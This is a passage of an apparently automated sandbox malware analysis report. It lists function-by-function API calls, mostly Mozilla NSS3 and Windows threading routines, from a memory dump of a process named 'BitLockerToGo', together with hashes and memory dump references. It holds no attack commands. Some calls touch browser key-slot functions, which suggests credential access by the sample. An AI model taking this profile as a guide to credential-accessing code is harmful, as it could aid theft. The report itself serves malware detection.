                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                                                                                                          • String ID: KRAM
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c4c4e2c7382c73b00e138ae6d7bb3c8ce357a73236845575e63f43c93890dbad
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c5d47d31f77a9da21aee573c48a34f2c0de83b114ccad0bf60ed3d4ff4d18ade
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4c4e2c7382c73b00e138ae6d7bb3c8ce357a73236845575e63f43c93890dbad
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6821E5B16156008FD700AF78C484559FBF0FF0A308F55896ED888CBB11DB30D89ACB99
                                                                                                                                                                                                                                                                                                                                                          Function 6C668E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3(?,?,?,6C682E62,?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C), ref: 6C668EA2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C68F854
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C68F868
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C68F882
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(04C483FF,?,?), ref: 6C68F889
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C68F8A4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C68F8AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C68F8C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(280F10EC,?,?), ref: 6C68F8D0
                                                                                                                                                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,?,?,6C682E62,?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C), ref: 6C668EC3
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C682E62,?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C), ref: 6C668EDC
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C682E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C668EF1
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C668F20
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: b.hl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1978757487-1805141922
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9f02f119435fdbb7827fd49af661448d5fe8bbb4de48d0d01a508a20ebc155c7
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6989603ba93910e7a37bb4260b98d0b9c6e7bcfc7195ef808c87671d3cdb74c1
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f02f119435fdbb7827fd49af661448d5fe8bbb4de48d0d01a508a20ebc155c7
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5216870A097059BDB00AF3AD184199BBF0FF4A358F41456EE8989BB51DB30E854CBDA
                                                                                                                                                                                                                                                                                                                                                          Function 6C698970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,6C6461C4,?,6C645639,00000000), ref: 6C698991
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C645639,00000000), ref: 6C6989AD
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C645639,00000000), ref: 6C6989C6
                                                                                                                                                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3 ref: 6C6989F7
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C645639,00000000), ref: 6C698A0C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                                                                                                                                                                                                                                                          • String ID: 9Vdl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2759447159-2177087973
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: acdea0e424965018612f71eeafb82579050bae8eae280f546fcbdf8a6df44af8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ceab1250f3d735a4e4ae788e0a8de51b55f5e7761847023fc13169a9c82eba6a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acdea0e424965018612f71eeafb82579050bae8eae280f546fcbdf8a6df44af8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93217CB0A04706CFDB00AF78C4841AABBF4FF0A359F114666DC9897711EB30D895CB9A
                                                                                                                                                                                                                                                                                                                                                          Function 6C752C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C752CA0
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C752CBE
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000014), ref: 6C752CD1
                                                                                                                                                                                                                                                                                                                                                          • strdup.MOZGLUE(?), ref: 6C752CE1
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C752D27
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • Loaded library %s (static lib), xrefs: 6C752D22
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                                                                                                                          • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: df5040273be8db7541823167daa7ea0f119deb86497888305f2ee1457bfef84a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a8f1e73e1e5d8d54efba5df906235aef2414cec0c02c655ff0d396a96201f5f7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df5040273be8db7541823167daa7ea0f119deb86497888305f2ee1457bfef84a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6811E2B1701210DFEB008F55E949A6A77B4EB4635DF94803DD809C7B51EF31E818CBA1
                                                                                                                                                                                                                                                                                                                                                          Function 6C6468E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6468FB
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C646913
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3 ref: 6C64693E
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C646946
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32 ref: 6C646951
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE ref: 6C64695D
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C646968
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1628394932-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f9b9a5f8cc6bec723e82b905396b5148b02bd36573eb7dff1d5c8ca828ddab7e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 69cda4900e450cff1f3a4984e07f8fda942ca25d0e6bf130de0f27b5eb7534da
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9b9a5f8cc6bec723e82b905396b5148b02bd36573eb7dff1d5c8ca828ddab7e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 011149B16086059FDB00AF78C48856EBBF4FF46349F058569D899DB601EB30D889CB96
                                                                                                                                                                                                                                                                                                                                                          Function 6C64BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C64BDCA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C64BDDB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C64BDEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A116E
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C64BE03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C698D2D,?,00000000,?), ref: 6C69FB85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C69FBB1
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C64BE22
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C64BE30
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C64BE3B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1821307800-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bfff5a5e91e41aae6c467454c29248b810d46c84600c07f75331603a8c636430
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1301DB69A4561176F71016A6BC01F9F79484FD23CDF148031FF059AB82FB51E91B82BE
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1044
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,00000800,6C63EF74,00000000), ref: 6C6A1064
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3379159031-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e7d8c360fe3ef703217c00113dfabda8d75467127bb2326fbddb951a35594ad
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a03e7e89b2ab547f34aabb25dc4432fe51d9f644812989a84f9199e4142736a9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7d8c360fe3ef703217c00113dfabda8d75467127bb2326fbddb951a35594ad
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA014830A00250DBEB202FBE9C08A867A78FF03799F010125E808D7A51EF60C947DBDD
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D1C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6D1C74
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C6D1C92
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6D1C99
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C6D1CCB
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6D1CD2
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3805613680-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0d76da151eabcd36146ecf722a49cc05b462c1a6b1060c5ab94dd1f070d9ae3a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 649dddf822b5e4a21c32da24fbef50501557654b0fdf3d05ca6bc9116a2ff908
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d76da151eabcd36146ecf722a49cc05b462c1a6b1060c5ab94dd1f070d9ae3a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 050196B1F052105FDF10AFE5BD0DB4D7BB4A70B319F510135E90EA6A40D775A1054799
                                                                                                                                                                                                                                                                                                                                                          Function 6C6E49C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000678,?,?,6C6D5F34,00000A20), ref: 6C6E49EC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
